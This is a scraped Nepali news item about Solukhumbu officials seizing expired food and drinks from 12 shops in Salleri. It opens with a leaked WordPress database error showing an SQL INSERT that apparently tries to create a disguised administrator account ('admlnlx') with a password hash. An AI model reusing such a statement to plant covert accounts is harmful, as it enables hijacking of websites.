WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BNdyfEeGPgOu6C9eD8vTBKU98ZCjr9.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 04:48:47', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, ८ माघ, सोलुखुम्बु । सोलुखुम्बु जिल्ला प्रशासनले करिब १ लाख मूल्य बराबरको म्याद गुज्रिएका खाद्य बस्तु बरामद गरेको छ । जिल्ला प्रशासन, जिल्ला प्रहरी, उद्योग वाणिज्य संघ र अन्य सरोकारवालाको सहभागितामा सोमबार सल्लेरीको नयाँ बजार देखि जिरो प्वाइन्ट सम्मका १२ वटा पसलहरुबाट उक्त मुल्य बराबरको खाद्य बस्तु बरामद गरेको हो ।
जिल्ला प्रशासनको नियमित कार्यक्रम अन्तर्गत बजार अनुगमन गरिएको सोलुखुम्बुका प्रमुख जिल्ला अधिकारी नरेन्द्र कुमार राना मगरको भनाइ छ । नागरिकको अधिकारमाथि खेलवाड गर्ने अधिकार कसैको नभएको प्रजिअ रानाले बताए ।
बजार अनुगमनबाट २ सय २१ प्याकेट विस्कुट, १ सय ४४ बोतल फ्यान्टा, रियल जुस र वुस्ट जुस गरि २२ वटा लगायत २६ वटा खाद्य पदार्थ र पेय पदार्थ बरामद गरिएको प्रशासनले जनाएको छ ।
जिल्लामा आउने सामान र जिल्लाको सदरमुकामबाट जिल्लाका अन्य स्थानमा जाने सामानको अनुगम गरिने प्रशासनको भनाइ छ । म्याद सकिएका सामान विक्रि गरिएको पाइएमा कानुन अनुसार कार्वाहि गरिने प्रसाशन कार्यलय सोलुखुम्बुले जनाएको छ ।